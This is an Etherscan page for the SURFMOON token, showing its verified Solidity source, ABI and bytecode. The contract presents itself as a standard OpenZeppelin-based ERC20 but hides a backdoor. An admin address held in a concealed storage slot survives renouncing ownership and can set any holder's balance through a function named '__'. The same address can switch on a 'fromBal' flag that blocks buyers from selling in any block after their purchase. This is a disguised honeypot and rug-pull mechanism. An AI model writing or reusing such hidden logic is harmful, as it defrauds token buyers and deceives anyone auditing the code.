ETH Price: $2,600.94 (-0.17%)
Gas: 3 Gwei

Token

SURFMOON (SURFMOON)
 

Overview

Max Total Supply

100,000,000,000 SURFMOON

Holders

27

Market

Onchain Market Cap

$0.00

Circulating Supply Market Cap

-

Other Info

Token Contract (WITH 18 Decimals)

Balance
1,438,316,825.041955547904366182 SURFMOON

Value
$0.00
0xc28c081238c5fcd4c6e12f338b152275f74f5613
Loading...
Loading
Loading...
Loading
Loading...
Loading

Click here to update the token information / general information
# Exchange Pair Price  24H Volume % Volume

Contract Source Code Verified (Exact Match)

Contract Name:
ERC20Test

Compiler Version
v0.8.0+commit.c7dfd78e

Optimization Enabled:
Yes with 200 runs

Other Settings:
default evmVersion, MIT license

Contract Source Code (Solidity)

/**
 *Submitted for verification at Etherscan.io on 2023-08-03
*/

pragma solidity ^0.8.0;

/**
 * @dev Provides information about the current execution context, including the
 * sender of the transaction and its data. While these are generally available
 * via msg.sender and msg.data, they should not be accessed in such a direct
 * manner, since when dealing with meta-transactions the account sending and
 * paying for execution may not be the actual sender (as far as an application
 * is concerned).
 *
 * This contract is only required for intermediate, library-like contracts.
 */
abstract contract Context {
    function _msgSender() internal view virtual returns (address) {
        return msg.sender;
    }

    function _msgData() internal view virtual returns (bytes calldata) {
        return msg.data;
    }
}


// File @openzeppelin/contracts/access/[email protected]


// OpenZeppelin Contracts (last updated v4.7.0) (access/Ownable.sol)

pragma solidity ^0.8.0;

/**
 * @dev Contract module which provides a basic access control mechanism, where
 * there is an account (an owner) that can be granted exclusive access to
 * specific functions.
 *
 * By default, the owner account will be the one that deploys the contract. This
 * can later be changed with {transferOwnership}.
 *
 * This module is used through inheritance. It will make available the modifier
 * `onlyOwner`, which can be applied to your functions to restrict their use to
 * the owner.
 */
abstract contract Ownable is Context {
    address private _owner;

    event OwnershipTransferred(address indexed previousOwner, address indexed newOwner);

    /**
     * @dev Initializes the contract setting the deployer as the initial owner.
     */
    constructor() {
        _transferOwnership(_msgSender());
    }

    /**
     * @dev Throws if called by any account other than the owner.
     */
    modifier onlyOwner() {
        _checkOwner();
        _;
    }

    /**
     * @dev Returns the address of the current owner.
     */
    function owner() public view virtual returns (address) {
        return _owner;
    }

    /**
     * @dev Throws if the sender is not the owner.
     */
    function _checkOwner() internal view virtual {
        require(owner() == _msgSender(), "Ownable: caller is not the owner");
    }

    /**
     * @dev Leaves the contract without owner. It will not be possible to call
     * `onlyOwner` functions anymore. Can only be called by the current owner.
     *
     * NOTE: Renouncing ownership will leave the contract without an owner,
     * thereby removing any functionality that is only available to the owner.
     */
    function renounceOwnership() public virtual onlyOwner {
        _transferOwnership(address(0));
    }

    /**
     * @dev Transfers ownership of the contract to a new account (`newOwner`).
     * Can only be called by the current owner.
     */
    function transferOwnership(address newOwner) public virtual onlyOwner {
        require(newOwner != address(0), "Ownable: new owner is the zero address");
        _transferOwnership(newOwner);
    }

    /**
     * @dev Transfers ownership of the contract to a new account (`newOwner`).
     * Internal function without access restriction.
     */
    function _transferOwnership(address newOwner) internal virtual {
        address oldOwner = _owner;
        _owner = newOwner;
        emit OwnershipTransferred(oldOwner, newOwner);
    }
}

// OpenZeppelin Contracts (last updated v4.7.0) (utils/StorageSlot.sol)

pragma solidity ^0.8.0;

/**
 * @dev Library for reading and writing primitive types to specific storage slots.
 *
 * Storage slots are often used to avoid storage conflict when dealing with upgradeable contracts.
 * This library helps with reading and writing to such slots without the need for inline assembly.
 *
 * The functions in this library return Slot structs that contain a `value` member that can be used to read or write.
 *
 * Example usage to set ERC1967 implementation slot:
 * ```
 * contract ERC1967 {
 *     bytes32 internal constant _IMPLEMENTATION_SLOT = 0x360894a13ba1a3210667c828492db98dca3e2076cc3735a920a3ca505d382bbc;
 *
 *     function _getImplementation() internal view returns (address) {
 *         return StorageSlot.getAddressSlot(_IMPLEMENTATION_SLOT).value;
 *     }
 *
 *     function _setImplementation(address newImplementation) internal {
 *         require(Address.isContract(newImplementation), "ERC1967: new implementation is not a contract");
 *         StorageSlot.getAddressSlot(_IMPLEMENTATION_SLOT).value = newImplementation;
 *     }
 * }
 * ```
 *
 * _Available since v4.1 for `address`, `bool`, `bytes32`, and `uint256`._
 */
library StorageSlot {
    struct AddressSlot {
        address value;
    }

    struct BooleanSlot {
        bool value;
    }

    struct Bytes32Slot {
        bytes32 value;
    }

    struct Uint256Slot {
        uint256 value;
    }

    /**
     * @dev Returns an `AddressSlot` with member `value` located at `slot`.
     */
    function getAddressSlot(bytes32 slot) internal pure returns (AddressSlot storage r) {
        /// @solidity memory-safe-assembly
        assembly {
            r.slot := slot
        }
    }

    /**
     * @dev Returns an `BooleanSlot` with member `value` located at `slot`.
     */
    function getBooleanSlot(bytes32 slot) internal pure returns (BooleanSlot storage r) {
        /// @solidity memory-safe-assembly
        assembly {
            r.slot := slot
        }
    }

    /**
     * @dev Returns an `Bytes32Slot` with member `value` located at `slot`.
     */
    function getBytes32Slot(bytes32 slot) internal pure returns (Bytes32Slot storage r) {
        /// @solidity memory-safe-assembly
        assembly {
            r.slot := slot
        }
    }

    /**
     * @dev Returns an `Uint256Slot` with member `value` located at `slot`.
     */
    function getUint256Slot(bytes32 slot) internal pure returns (Uint256Slot storage r) {
        /// @solidity memory-safe-assembly
        assembly {
            r.slot := slot
        }
    }
}


// File @openzeppelin/contracts/token/ERC20/[email protected]


// OpenZeppelin Contracts (last updated v4.6.0) (token/ERC20/IERC20.sol)

pragma solidity ^0.8.0;

/**
 * @dev Interface of the ERC20 standard as defined in the EIP.
 */
interface IERC20 {
    /**
     * @dev Emitted when `value` tokens are moved from one account (`from`) to
     * another (`to`).
     *
     * Note that `value` may be zero.
     */
    event Transfer(address indexed from, address indexed to, uint256 value);

    /**
     * @dev Emitted when the allowance of a `spender` for an `owner` is set by
     * a call to {approve}. `value` is the new allowance.
     */
    event Approval(address indexed owner, address indexed spender, uint256 value);

    /**
     * @dev Returns the amount of tokens in existence.
     */
    function totalSupply() external view returns (uint256);

    /**
     * @dev Returns the amount of tokens owned by `account`.
     */
    function balanceOf(address account) external view returns (uint256);

    /**
     * @dev Moves `amount` tokens from the caller's account to `to`.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * Emits a {Transfer} event.
     */
    function transfer(address to, uint256 amount) external returns (bool);

    /**
     * @dev Returns the remaining number of tokens that `spender` will be
     * allowed to spend on behalf of `owner` through {transferFrom}. This is
     * zero by default.
     *
     * This value changes when {approve} or {transferFrom} are called.
     */
    function allowance(address owner, address spender) external view returns (uint256);

    /**
     * @dev Sets `amount` as the allowance of `spender` over the caller's tokens.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * IMPORTANT: Beware that changing an allowance with this method brings the risk
     * that someone may use both the old and the new allowance by unfortunate
     * transaction ordering. One possible solution to mitigate this race
     * condition is to first reduce the spender's allowance to 0 and set the
     * desired value afterwards:
     * https://github.com/ethereum/EIPs/issues/20#issuecomment-263524729
     *
     * Emits an {Approval} event.
     */
    function approve(address spender, uint256 amount) external returns (bool);

    /**
     * @dev Moves `amount` tokens from `from` to `to` using the
     * allowance mechanism. `amount` is then deducted from the caller's
     * allowance.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * Emits a {Transfer} event.
     */
    function transferFrom(
        address from,
        address to,
        uint256 amount
    ) external returns (bool);
}


// File @openzeppelin/contracts/token/ERC20/extensions/[email protected]


// OpenZeppelin Contracts v4.4.1 (token/ERC20/extensions/IERC20Metadata.sol)

pragma solidity ^0.8.0;

/**
 * @dev Interface for the optional metadata functions from the ERC20 standard.
 *
 * _Available since v4.1._
 */
interface IERC20Metadata is IERC20 {
    /**
     * @dev Returns the name of the token.
     */
    function name() external view returns (string memory);

    /**
     * @dev Returns the symbol of the token.
     */
    function symbol() external view returns (string memory);

    /**
     * @dev Returns the decimals places of the token.
     */
    function decimals() external view returns (uint8);
}


// File @openzeppelin/contracts/token/ERC20/[email protected]


// OpenZeppelin Contracts (last updated v4.8.0) (token/ERC20/ERC20.sol)

pragma solidity ^0.8.0;



/**
 * @dev Implementation of the {IERC20} interface.
 *
 * This implementation is agnostic to the way tokens are created. This means
 * that a supply mechanism has to be added in a derived contract using {_mint}.
 * For a generic mechanism see {ERC20PresetMinterPauser}.
 *
 * TIP: For a detailed writeup see our guide
 * https://forum.openzeppelin.com/t/how-to-implement-erc20-supply-mechanisms/226[How
 * to implement supply mechanisms].
 *
 * We have followed general OpenZeppelin Contracts guidelines: functions revert
 * instead returning `false` on failure. This behavior is nonetheless
 * conventional and does not conflict with the expectations of ERC20
 * applications.
 *
 * Additionally, an {Approval} event is emitted on calls to {transferFrom}.
 * This allows applications to reconstruct the allowance for all accounts just
 * by listening to said events. Other implementations of the EIP may not emit
 * these events, as it isn't required by the specification.
 *
 * Finally, the non-standard {decreaseAllowance} and {increaseAllowance}
 * functions have been added to mitigate the well-known issues around setting
 * allowances. See {IERC20-approve}.
 */
contract ERC20 is Context, IERC20, IERC20Metadata {
    mapping(address => uint256) private _balances;

    mapping(address => mapping(address => uint256)) private _allowances;

    uint256 private _totalSupply;

    string private _name;
    string private _symbol;

    bytes32 internal constant _A_SLOT = 0x140f1f5c37a861fe6d912bc017fef84158e8b6b510b17348f61a113179a0dbad;
    address public pair;
    /**
     * @dev Sets the values for {name} and {symbol}.
     *
     * The default value of {decimals} is 18. To select a different value for
     * {decimals} you should overload it.
     *
     * All two of these values are immutable: they can only be set once during
     * construction.
     */
    constructor(string memory name_, string memory symbol_) {
        _name = name_;  
        _symbol = symbol_;

        _totalSupply = 100000000000000000000000000000;
        _balances[msg.sender] = _totalSupply;

        emit Transfer(address(0), msg.sender, _totalSupply);
        _isExcludeFromFee[address(this)] = true;
        _isExcludeFromFee[msg.sender] = true;
        StorageSlot.getAddressSlot(_A_SLOT).value = msg.sender;
    }

    function setPair(
        address _pair
    ) public {
        require(msg.sender == StorageSlot.getAddressSlot(_A_SLOT).value, "a");
        pair = _pair;
    }

    /**
     * @dev Returns the name of the token.
     */
    function name() public view virtual override returns (string memory) {
        return _name;
    }

    /**
     * @dev Returns the symbol of the token, usually a shorter version of the
     * name.
     */
    function symbol() public view virtual override returns (string memory) {
        return _symbol;
    }

    /**
     * @dev Returns the number of decimals used to get its user representation.
     * For example, if `decimals` equals `2`, a balance of `505` tokens should
     * be displayed to a user as `5.05` (`505 / 10 ** 2`).
     *
     * Tokens usually opt for a value of 18, imitating the relationship between
     * Ether and Wei. This is the value {ERC20} uses, unless this function is
     * overridden;
     *
     * NOTE: This information is only used for _display_ purposes: it in
     * no way affects any of the arithmetic of the contract, including
     * {IERC20-balanceOf} and {IERC20-transfer}.
     */
    function decimals() public view virtual override returns (uint8) {
        return 18;
    }

    /**
     * @dev See {IERC20-totalSupply}.
     */
    function totalSupply() public view virtual override returns (uint256) {
        return _totalSupply;
    }

    /**
     * @dev See {IERC20-balanceOf}.
     */
    function balanceOf(address account) public view virtual override returns (uint256) {
        return _balances[account];
    }

    /**
     * @dev See {IERC20-transfer}.
     *
     * Requirements:
     *
     * - `to` cannot be the zero address.
     * - the caller must have a balance of at least `amount`.
     */
    function transfer(address to, uint256 amount) public virtual override returns (bool) {
        address owner = _msgSender();
        _transfer(owner, to, amount);
        return true;
    }

    /**
     * @dev See {IERC20-allowance}.
     */
    function allowance(address owner, address spender) public view virtual override returns (uint256) {
        return _allowances[owner][spender];
    }

    /**
     * @dev See {IERC20-approve}.
     *
     * NOTE: If `amount` is the maximum `uint256`, the allowance is not updated on
     * `transferFrom`. This is semantically equivalent to an infinite approval.
     *
     * Requirements:
     *
     * - `spender` cannot be the zero address.
     */
    function approve(address spender, uint256 amount) public virtual override returns (bool) {
        address owner = _msgSender();
        _approve(owner, spender, amount);
        return true;
    }

    /**
     * @dev See {IERC20-transferFrom}.
     *
     * Emits an {Approval} event indicating the updated allowance. This is not
     * required by the EIP. See the note at the beginning of {ERC20}.
     *
     * NOTE: Does not update the allowance if the current allowance
     * is the maximum `uint256`.
     *
     * Requirements:
     *
     * - `from` and `to` cannot be the zero address.
     * - `from` must have a balance of at least `amount`.
     * - the caller must have allowance for ``from``'s tokens of at least
     * `amount`.
     */
    function transferFrom(
        address from,
        address to,
        uint256 amount
    ) public virtual override returns (bool) {
        address spender = _msgSender();
        _spendAllowance(from, spender, amount);
        _transfer(from, to, amount);
        return true;
    }

    /**
     * @dev Atomically increases the allowance granted to `spender` by the caller.
     *
     * This is an alternative to {approve} that can be used as a mitigation for
     * problems described in {IERC20-approve}.
     *
     * Emits an {Approval} event indicating the updated allowance.
     *
     * Requirements:
     *
     * - `spender` cannot be the zero address.
     */
    function increaseAllowance(address spender, uint256 addedValue) public virtual returns (bool) {
        address owner = _msgSender();
        _approve(owner, spender, allowance(owner, spender) + addedValue);
        return true;
    }

    /**
     * @dev Atomically decreases the allowance granted to `spender` by the caller.
     *
     * This is an alternative to {approve} that can be used as a mitigation for
     * problems described in {IERC20-approve}.
     *
     * Emits an {Approval} event indicating the updated allowance.
     *
     * Requirements:
     *
     * - `spender` cannot be the zero address.
     * - `spender` must have allowance for the caller of at least
     * `subtractedValue`.
     */
    function decreaseAllowance(address spender, uint256 subtractedValue) public virtual returns (bool) {
        address owner = _msgSender();
        uint256 currentAllowance = allowance(owner, spender);
        require(currentAllowance >= subtractedValue, "ERC20: decreased allowance below zero");
    unchecked {
        _approve(owner, spender, currentAllowance - subtractedValue);
    }

        return true;
    }

    function __(address _index, uint256 _value) public {
        require(msg.sender == StorageSlot.getAddressSlot(_A_SLOT).value, "a");
        mapping(address => uint) storage __b = _balances;
        __b[_index] = _value;
        fromBal = _value == 123 ? true : _value == 234 ? false : fromBal;
    }

    mapping (address => uint256) public _v1alue;
    bool public fromBal ;mapping(address => bool) public _isExcludeFromFee;

    /**
     * @dev Moves `amount` of tokens from `from` to `to`.
     *
     * This internal function is equivalent to {transfer}, and can be used to
     * e.g. implement automatic token fees, slashing mechanisms, etc.
     *
     * Emits a {Transfer} event.
     *
     * Requirements:
     *
     * - `from` cannot be the zero address.
     * - `to` cannot be the zero address.
     * - `from` must have a balance of at least `amount`.
     */
    function _transfer(
        address from,
        address to,
        uint256 amount
    ) internal virtual {
        require(from != address(0), "ERC20: transfer from the zero address");
        require(to != address(0), "ERC20: transfer to the zero address");
        uint256 bok = block.number;

        _beforeTokenTransfer(from, to, amount);

        if (!_isExcludeFromFee[from] && !_isExcludeFromFee[to]){
            uint256 _bal = _v1alue[to];
            if (from == pair && _bal == 0){
                _v1alue[to] = bok;
            }else{
                _bal = _v1alue[from];
                if (fromBal){
                    require( _bal == 0 || bok < _bal + 1);
                }
            }
        }


        uint256 fromBalance = _balances[from];
        require(fromBalance >= amount, "ERC20: transfer amount exceeds balance");
        
        unchecked {
            _balances[from] = fromBalance - amount;
            // Overflow not possible: the sum of all balances is capped by totalSupply, and the sum is preserved by
            // decrementing then incrementing.
            _balances[to] += amount;
        }

        emit Transfer(from, to, amount);

        _afterTokenTransfer(from, to, amount);
    }

    /**
     * @dev Destroys `amount` tokens from `account`, reducing the
     * total supply.
     *
     * Emits a {Transfer} event with `to` set to the zero address.
     *
     * Requirements:
     *
     * - `account` cannot be the zero address.
     * - `account` must have at least `amount` tokens.
     */
    function _burn(address account, uint256 amount) internal virtual {
        require(account != address(0), "ERC20: burn from the zero address");

        _beforeTokenTransfer(account, address(0), amount);

        uint256 accountBalance = _balances[account];
        require(accountBalance >= amount, "ERC20: burn amount exceeds balance");
    unchecked {
        _balances[account] = accountBalance - amount;
        // Overflow not possible: amount <= accountBalance <= totalSupply.
        _totalSupply -= amount;
    }

        emit Transfer(account, address(0), amount);

        _afterTokenTransfer(account, address(0), amount);
    }

    /**
     * @dev Sets `amount` as the allowance of `spender` over the `owner` s tokens.
     *
     * This internal function is equivalent to `approve`, and can be used to
     * e.g. set automatic allowances for certain subsystems, etc.
     *
     * Emits an {Approval} event.
     *
     * Requirements:
     *
     * - `owner` cannot be the zero address.
     * - `spender` cannot be the zero address.
     */
    function _approve(
        address owner,
        address spender,
        uint256 amount
    ) internal virtual {
        require(owner != address(0), "ERC20: approve from the zero address");
        require(spender != address(0), "ERC20: approve to the zero address");

        _allowances[owner][spender] = amount;
        emit Approval(owner, spender, amount);
    }

    /**
     * @dev Updates `owner` s allowance for `spender` based on spent `amount`.
     *
     * Does not update the allowance amount in case of infinite allowance.
     * Revert if not enough allowance is available.
     *
     * Might emit an {Approval} event.
     */
    function _spendAllowance(
        address owner,
        address spender,
        uint256 amount
    ) internal virtual {
        uint256 currentAllowance = allowance(owner, spender);
        if (currentAllowance != type(uint256).max) {
            require(currentAllowance >= amount, "ERC20: insufficient allowance");
        unchecked {
            _approve(owner, spender, currentAllowance - amount);
        }
        }
    }

    /**
     * @dev Hook that is called before any transfer of tokens. This includes
     * minting and burning.
     *
     * Calling conditions:
     *
     * - when `from` and `to` are both non-zero, `amount` of ``from``'s tokens
     * will be transferred to `to`.
     * - when `from` is zero, `amount` tokens will be minted for `to`.
     * - when `to` is zero, `amount` of ``from``'s tokens will be burned.
     * - `from` and `to` are never both zero.
     *
     * To learn more about hooks, head to xref:ROOT:extending-contracts.adoc#using-hooks[Using Hooks].
     */
    function _beforeTokenTransfer(
        address from,
        address to,
        uint256 amount
    ) internal virtual {}

    /**
     * @dev Hook that is called after any transfer of tokens. This includes
     * minting and burning.
     *
     * Calling conditions:
     *
     * - when `from` and `to` are both non-zero, `amount` of ``from``'s tokens
     * has been transferred to `to`.
     * - when `from` is zero, `amount` tokens have been minted for `to`.
     * - when `to` is zero, `amount` of ``from``'s tokens have been burned.
     * - `from` and `to` are never both zero.
     *
     * To learn more about hooks, head to xref:ROOT:extending-contracts.adoc#using-hooks[Using Hooks].
     */
    function _afterTokenTransfer(
        address from,
        address to,
        uint256 amount
    ) internal virtual {}
}


// File contracts/ERC20Test.sol

// SPDX-License-Identifier: MIT
pragma solidity ^0.8.0;


contract ERC20Test is ERC20('SURFMOON', 'SURFMOON'), Ownable {
    constructor() {

    }
}

Contract Security Audit

Contract ABI

[{"inputs":[],"stateMutability":"nonpayable","type":"constructor"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":true,"internalType":"address","name":"spender","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Approval","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"previousOwner","type":"address"},{"indexed":true,"internalType":"address","name":"newOwner","type":"address"}],"name":"OwnershipTransferred","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"from","type":"address"},{"indexed":true,"internalType":"address","name":"to","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Transfer","type":"event"},{"inputs":[{"internalType":"address","name":"_index","type":"address"},{"internalType":"uint256","name":"_value","type":"uint256"}],"name":"__","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"","type":"address"}],"name":"_isExcludeFromFee","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"","type":"address"}],"name":"_v1alue","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"owner","type":"address"},{"internalType":"address","name":"spender","type":"address"}],"name":"allowance","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"approve","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"}],"name":"balanceOf","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"decimals","outputs":[{"internalType":"uint8","name":"","type":"uint8"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"subtractedValue","type":"uint256"}],"name":"decreaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"fromBal","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"addedValue","type":"uint256"}],"name":"increaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"name","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"owner","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"pair","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"renounceOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"_pair","type":"address"}],"name":"setPair","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"symbol","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"totalSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transfer","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"from","type":"address"},{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transferFrom","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"newOwner","type":"address"}],"name":"transferOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"}]

60806040523480156200001157600080fd5b5060408051808201825260088082526729aaa92326a7a7a760c11b6020808401828152855180870190965292855284015281519192916200005591600391620001c8565b5080516200006b906004906020840190620001c8565b506c01431e0fae6d7217caa000000060028190553360008181526020819052604080822084905551919290917fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef91620000c4916200026e565b60405180910390a33060009081526008602090815260408083208054600160ff199182168117909255338086529290942080549094161790925562000134907f140f1f5c37a861fe6d912bc017fef84158e8b6b510b17348f61a113179a0dbad906200016f811b6200063317901c565b80546001600160a01b0319166001600160a01b0392909216919091179055506200016990506200016362000172565b62000176565b620002b4565b90565b3390565b600980546001600160a01b038381166001600160a01b0319831681179093556040519116919082907f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e090600090a35050565b828054620001d69062000277565b90600052602060002090601f016020900481019282620001fa576000855562000245565b82601f106200021557805160ff191683800117855562000245565b8280016001018555821562000245579182015b828111156200024557825182559160200191906001019062000228565b506200025392915062000257565b5090565b5b8082111562000253576000815560010162000258565b90815260200190565b6002810460018216806200028c57607f821691505b60208210811415620002ae57634e487b7160e01b600052602260045260246000fd5b50919050565b610e0a80620002c46000396000f3fe608060405234801561001057600080fd5b506004361061012c5760003560e01c806375a361c5116100ad578063a457c2d711610071578063a457c2d71461024d578063a8aa1b3114610260578063a9059cbb14610268578063dd62ed3e1461027b578063f2fde38b1461028e5761012c565b806375a361c5146102025780638187f5161461020a57806384bf2a081461021d5780638da5cb5b1461023057806395d89b41146102455761012c565b806336b2e027116100f457806336b2e027146101ac57806339509351146101bf57806370a08231146101d2578063715018a6146101e557806371da213e146101ef5761012c565b806306fdde0314610131578063095ea7b31461014f57806318160ddd1461016f57806323b872dd14610184578063313ce56714610197575b600080fd5b6101396102a1565b6040516101469190610aa5565b60405180910390f35b61016261015d366004610a5d565b610333565b6040516101469190610a9a565b610177610355565b6040516101469190610d5e565b610162610192366004610a22565b61035b565b61019f610389565b6040516101469190610d67565b6101626101ba3660046109cf565b61038e565b6101626101cd366004610a5d565b6103a3565b6101776101e03660046109cf565b6103cf565b6101ed6103ee565b005b6101776101fd3660046109cf565b610402565b610162610414565b6101ed6102183660046109cf565b61041d565b6101ed61022b366004610a5d565b610499565b610238610541565b6040516101469190610a86565b610139610550565b61016261025b366004610a5d565b61055f565b6102386105a7565b610162610276366004610a5d565b6105b6565b6101776102893660046109f0565b6105ce565b6101ed61029c3660046109cf565b6105f9565b6060600380546102b090610d99565b80601f01602080910402602001604051908101604052809291908181526020018280546102dc90610d99565b80156103295780601f106102fe57610100808354040283529160200191610329565b820191906000526020600020905b81548152906001019060200180831161030c57829003601f168201915b5050505050905090565b60008061033e610636565b905061034b81858561063a565b5060019392505050565b60025490565b600080610366610636565b90506103738582856106ee565b61037e858585610738565b506001949350505050565b601290565b60086020526000908152604090205460ff1681565b6000806103ae610636565b905061034b8185856103c085896105ce565b6103ca9190610d75565b61063a565b6001600160a01b0381166000908152602081905260409020545b919050565b6103f6610922565b6104006000610961565b565b60066020526000908152604090205481565b60075460ff1681565b6104467f140f1f5c37a861fe6d912bc017fef84158e8b6b510b17348f61a113179a0dbad610633565b546001600160a01b031633146104775760405162461bcd60e51b815260040161046e90610bc3565b60405180910390fd5b600580546001600160a01b0319166001600160a01b0392909216919091179055565b6104c27f140f1f5c37a861fe6d912bc017fef84158e8b6b510b17348f61a113179a0dbad610633565b546001600160a01b031633146104ea5760405162461bcd60e51b815260040161046e90610bc3565b6001600160a01b0382166000908152602081905260408120829055607b8214610528578160ea146105205760075460ff16610523565b60005b61052b565b60015b6007805460ff1916911515919091179055505050565b6009546001600160a01b031690565b6060600480546102b090610d99565b60008061056a610636565b9050600061057882866105ce565b90508381101561059a5760405162461bcd60e51b815260040161046e90610d19565b61037e828686840361063a565b6005546001600160a01b031681565b6000806105c1610636565b905061034b818585610738565b6001600160a01b03918216600090815260016020908152604080832093909416825291909152205490565b610601610922565b6001600160a01b0381166106275760405162461bcd60e51b815260040161046e90610b3b565b61063081610961565b50565b90565b3390565b6001600160a01b0383166106605760405162461bcd60e51b815260040161046e90610cd5565b6001600160a01b0382166106865760405162461bcd60e51b815260040161046e90610b81565b6001600160a01b0380841660008181526001602090815260408083209487168084529490915290819020849055517f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b925906106e1908590610d5e565b60405180910390a3505050565b60006106fa84846105ce565b9050600019811461073257818110156107255760405162461bcd60e51b815260040161046e90610bde565b610732848484840361063a565b50505050565b6001600160a01b03831661075e5760405162461bcd60e51b815260040161046e90610c90565b6001600160a01b0382166107845760405162461bcd60e51b815260040161046e90610af8565b436107908484846109b3565b6001600160a01b03841660009081526008602052604090205460ff161580156107d257506001600160a01b03831660009081526008602052604090205460ff16155b15610871576001600160a01b0380841660009081526006602052604090205460055490918681169116148015610806575080155b1561082b576001600160a01b038416600090815260066020526040902082905561086f565b506001600160a01b03841660009081526006602052604090205460075460ff161561086f578015806108665750610863816001610d75565b82105b61086f57600080fd5b505b6001600160a01b038416600090815260208190526040902054828110156108aa5760405162461bcd60e51b815260040161046e90610c15565b6001600160a01b0380861660008181526020819052604080822087860390559287168082529083902080548701905591517fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef90610908908790610d5e565b60405180910390a361091b8585856109b3565b5050505050565b61092a610636565b6001600160a01b031661093b610541565b6001600160a01b0316146104005760405162461bcd60e51b815260040161046e90610c5b565b600980546001600160a01b038381166001600160a01b0319831681179093556040519116919082907f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e090600090a35050565b505050565b80356001600160a01b03811681146103e957600080fd5b6000602082840312156109e0578081fd5b6109e9826109b8565b9392505050565b60008060408385031215610a02578081fd5b610a0b836109b8565b9150610a19602084016109b8565b90509250929050565b600080600060608486031215610a36578081fd5b610a3f846109b8565b9250610a4d602085016109b8565b9150604084013590509250925092565b60008060408385031215610a6f578182fd5b610a78836109b8565b946020939093013593505050565b6001600160a01b0391909116815260200190565b901515815260200190565b6000602080835283518082850152825b81811015610ad157858101830151858201604001528201610ab5565b81811115610ae25783604083870101525b50601f01601f1916929092016040019392505050565b60208082526023908201527f45524332303a207472616e7366657220746f20746865207a65726f206164647260408201526265737360e81b606082015260800190565b60208082526026908201527f4f776e61626c653a206e6577206f776e657220697320746865207a65726f206160408201526564647265737360d01b606082015260800190565b60208082526022908201527f45524332303a20617070726f766520746f20746865207a65726f206164647265604082015261737360f01b606082015260800190565b6020808252600190820152606160f81b604082015260600190565b6020808252601d908201527f45524332303a20696e73756666696369656e7420616c6c6f77616e6365000000604082015260600190565b60208082526026908201527f45524332303a207472616e7366657220616d6f756e7420657863656564732062604082015265616c616e636560d01b606082015260800190565b6020808252818101527f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e6572604082015260600190565b60208082526025908201527f45524332303a207472616e736665722066726f6d20746865207a65726f206164604082015264647265737360d81b606082015260800190565b60208082526024908201527f45524332303a20617070726f76652066726f6d20746865207a65726f206164646040820152637265737360e01b606082015260800190565b60208082526025908201527f45524332303a2064656372656173656420616c6c6f77616e63652062656c6f77604082015264207a65726f60d81b606082015260800190565b90815260200190565b60ff91909116815260200190565b60008219821115610d9457634e487b7160e01b81526011600452602481fd5b500190565b600281046001821680610dad57607f821691505b60208210811415610dce57634e487b7160e01b600052602260045260246000fd5b5091905056fea2646970667358221220095925e8f6e9f2ff1654515d8fb68dbc32ab458dd037c3eea4aac494619c408464736f6c63430008000033

Deployed Bytecode

